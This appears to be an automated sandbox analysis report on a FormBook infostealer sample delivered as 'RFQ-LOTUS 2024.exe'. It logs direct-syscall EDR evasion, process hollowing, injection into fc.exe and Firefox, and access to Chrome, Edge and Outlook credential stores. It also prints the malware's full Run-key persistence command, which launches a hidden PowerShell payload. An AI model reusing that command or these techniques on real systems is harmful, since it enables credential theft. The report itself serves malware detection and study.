Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23225636 mov eax, dword ptr fs:[00000030h]	12_2_23225636
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231CE609 mov eax, dword ptr fs:[00000030h]	12_2_231CE609
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318F603 mov eax, dword ptr fs:[00000030h]	12_2_2318F603
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316260B mov eax, dword ptr fs:[00000030h]	12_2_2316260B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316260B mov eax, dword ptr fs:[00000030h]	12_2_2316260B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316260B mov eax, dword ptr fs:[00000030h]	12_2_2316260B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316260B mov eax, dword ptr fs:[00000030h]	12_2_2316260B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316260B mov eax, dword ptr fs:[00000030h]	12_2_2316260B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316260B mov eax, dword ptr fs:[00000030h]	12_2_2316260B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316260B mov eax, dword ptr fs:[00000030h]	12_2_2316260B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23181607 mov eax, dword ptr fs:[00000030h]	12_2_23181607
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316E627 mov eax, dword ptr fs:[00000030h]	12_2_2316E627
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F626 mov eax, dword ptr fs:[00000030h]	12_2_2314F626
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F626 mov eax, dword ptr fs:[00000030h]	12_2_2314F626
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F626 mov eax, dword ptr fs:[00000030h]	12_2_2314F626
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F626 mov eax, dword ptr fs:[00000030h]	12_2_2314F626
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F626 mov eax, dword ptr fs:[00000030h]	12_2_2314F626
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F626 mov eax, dword ptr fs:[00000030h]	12_2_2314F626
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F626 mov eax, dword ptr fs:[00000030h]	12_2_2314F626
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F626 mov eax, dword ptr fs:[00000030h]	12_2_2314F626
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F626 mov eax, dword ptr fs:[00000030h]	12_2_2314F626
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23186620 mov eax, dword ptr fs:[00000030h]	12_2_23186620
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23188620 mov eax, dword ptr fs:[00000030h]	12_2_23188620
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315262C mov eax, dword ptr fs:[00000030h]	12_2_2315262C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321866E mov eax, dword ptr fs:[00000030h]	12_2_2321866E
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321866E mov eax, dword ptr fs:[00000030h]	12_2_2321866E
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316C640 mov eax, dword ptr fs:[00000030h]	12_2_2316C640
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23182674 mov eax, dword ptr fs:[00000030h]	12_2_23182674
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318A660 mov eax, dword ptr fs:[00000030h]	12_2_2318A660
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318A660 mov eax, dword ptr fs:[00000030h]	12_2_2318A660
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23189660 mov eax, dword ptr fs:[00000030h]	12_2_23189660
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23189660 mov eax, dword ptr fs:[00000030h]	12_2_23189660
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23154690 mov eax, dword ptr fs:[00000030h]	12_2_23154690
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23154690 mov eax, dword ptr fs:[00000030h]	12_2_23154690
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D368C mov eax, dword ptr fs:[00000030h]	12_2_231D368C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D368C mov eax, dword ptr fs:[00000030h]	12_2_231D368C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D368C mov eax, dword ptr fs:[00000030h]	12_2_231D368C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D368C mov eax, dword ptr fs:[00000030h]	12_2_231D368C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231476B2 mov eax, dword ptr fs:[00000030h]	12_2_231476B2
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231476B2 mov eax, dword ptr fs:[00000030h]	12_2_231476B2
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231476B2 mov eax, dword ptr fs:[00000030h]	12_2_231476B2
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231866B0 mov eax, dword ptr fs:[00000030h]	12_2_231866B0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314D6AA mov eax, dword ptr fs:[00000030h]	12_2_2314D6AA
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314D6AA mov eax, dword ptr fs:[00000030h]	12_2_2314D6AA
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318C6A6 mov eax, dword ptr fs:[00000030h]	12_2_2318C6A6
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2320D6F0 mov eax, dword ptr fs:[00000030h]	12_2_2320D6F0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315B6C0 mov eax, dword ptr fs:[00000030h]	12_2_2315B6C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315B6C0 mov eax, dword ptr fs:[00000030h]	12_2_2315B6C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315B6C0 mov eax, dword ptr fs:[00000030h]	12_2_2315B6C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315B6C0 mov eax, dword ptr fs:[00000030h]	12_2_2315B6C0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: NULL target: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: NULL target: C:\Windows\SysWOW64\fc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: NULL target: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: NULL target: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\fc.exe

Thread register set: target process: 2496

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Section unmapped: C:\Users\user\AppData\Local\Temp\Minken.exe base address: 400000

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Users\user\AppData\Local\Temp\Minken.exe base: 1660000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Users\user\AppData\Local\Temp\Minken.exe base: 19FFF4			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Minken.exe "C:\Users\user\AppData\Local\Temp\Minken.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Paraferingen" /t REG_EXPAND_SZ /d "%Uhelds% -windowstyle minimized $Sivsanger=(Get-ItemProperty -Path 'HKCU:\Arkitekttegningers\').Daughterling;%Uhelds% ($Sivsanger)"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Paraferingen" /t REG_EXPAND_SZ /d "%Uhelds% -windowstyle minimized $Sivsanger=(Get-ItemProperty -Path 'HKCU:\Arkitekttegningers\').Daughterling;%Uhelds% ($Sivsanger)"	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Process created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "paraferingen" /t reg_expand_sz /d "%uhelds% -windowstyle minimized $sivsanger=(get-itemproperty -path 'hkcu:\arkitekttegningers\').daughterling;%uhelds% ($sivsanger)"
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "paraferingen" /t reg_expand_sz /d "%uhelds% -windowstyle minimized $sivsanger=(get-itemproperty -path 'hkcu:\arkitekttegningers\').daughterling;%uhelds% ($sivsanger)"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe

Code function: 0_2_0040604F GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_0040604F

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 00000012.00000002.4124828418.00000000007C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4125392542.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4124789568.0000000002160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4124881120.0000000000800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2939523462.0000000022E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4123618646.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\fc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\fc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 00000012.00000002.4124828418.00000000007C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4125392542.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4124789568.0000000002160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
